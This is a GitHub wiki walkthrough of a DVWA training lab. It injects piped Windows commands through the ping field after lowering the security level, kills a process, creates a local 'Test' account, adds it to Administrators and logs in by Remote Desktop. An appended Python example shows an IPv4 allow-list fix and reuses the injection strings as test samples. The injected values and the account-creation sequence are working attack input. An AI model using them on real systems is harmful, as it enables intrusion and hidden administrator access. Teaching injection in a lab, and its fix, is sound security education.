Remote access using the command injection DVWA - singirikondamani/Noted GitHub Wiki

Here’s a simplified step-by-step breakdown of the process:

  1. Log in to DVWA:

    • Enter Username: gordonb, Password: abc123.
    • Click Login.
  2. Access Command Injection:

    • Click Command Injection in the left pane.
  3. Ping a Device:

    • Enter the IP address of the Windows Server (10.10.1.22) in the IP address field.
    • Click Submit to ping the machine.
  4. Test Command Execution:

    • Enter | hostname and click Submit.
    • DVWA returns an error because the security level is set to Impossible.
  5. Change Security Level:

    • Click DVWA Security in the left pane.
    • Set the security level to Low and click Submit.
  6. Execute Commands:

    • Go back to Command Injection.
    • Enter | hostname again and click Submit.
    • DVWA returns the hostname of the Windows Server.
  7. Extract More Information:

    • Enter | whoami and click Submit to display user info.
    • Enter | tasklist to view running processes.
  8. Terminate a Process:

    • Note the PID of a process (e.g., 3112) and enter | taskkill /PID 3112 /F.
    • Click Submit to terminate the process.
  9. View Directory Structure:

    • Enter | dir C:\ and click Submit to view the C drive files.
  10. View and Add Users:

    • Enter | net user to list user accounts.
    • Add a new user by typing | net user Test /Add.
    • Confirm the account by typing | net user Test.
  11. Assign Admin Privileges:

    • Enter | net localgroup Administrators Test /Add and click Submit.
  12. Connect via Remote Desktop:

    • Open Remote Desktop Connection.
    • Enter the target system’s IP (10.10.1.22).
    • Use test as the username, leave the password blank, and click Connect.
  13. Close Session:

    • Log out from the remote desktop and close the application.

This concludes the steps for exploiting the command execution vulnerability in DVWA.
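
The difference between step 4 (input rejected) and step 6 (input executed) comes down to how the IP address field is handled before it reaches the operating system. The following is an added example, not DVWA's code and not part of the original wiki page: it contrasts a command line built by string concatenation with an allow-list check that accepts only a dotted-quad IPv4 address and passes it as a separate argument. The function names are hypothetical, and `-n 4` assumes the Windows `ping` syntax.

```python
import re

# One IPv4 octet, 0-255, ASCII digits only.
_OCTET = r"(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])"
_IPV4 = re.compile(rf"{_OCTET}(?:\.{_OCTET}){{3}}")


def vulnerable_command(user_input: str) -> str:
    """'Before' pattern: the field is pasted into a shell command line, so a
    '|' in the field starts a second command. Built here, never executed."""
    return "ping " + user_input


def safe_ping_argv(user_input: str) -> list:
    """Allow-list the field as an IPv4 address and return an argument vector.
    Intended for subprocess.run(argv) with the default shell=False, so the
    value can never be parsed as shell syntax."""
    if not _IPV4.fullmatch(user_input):
        raise ValueError("not an IPv4 address")
    return ["ping", "-n", "4", user_input]  # -n: Windows echo-request count


def check(user_input: str) -> str:
    """Report whether the hardened handler would accept the field value."""
    try:
        safe_ping_argv(user_input)
        return "accepted"
    except ValueError:
        return "rejected"


# Field values taken from the steps above, plus two malformed addresses.
SAMPLES = [
    "10.10.1.22",
    "| hostname",
    "| whoami",
    "| net user Test /Add",
    "10.10.1.22 | tasklist",
    "10.10.1.999",
    "10.10.1.22\n",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:26} shell string {vulnerable_command(s)!r:32} -> {check(s)}")
```

Only the first sample is accepted; every value containing a pipe, trailing text, or an out-of-range octet is rejected before any process is started.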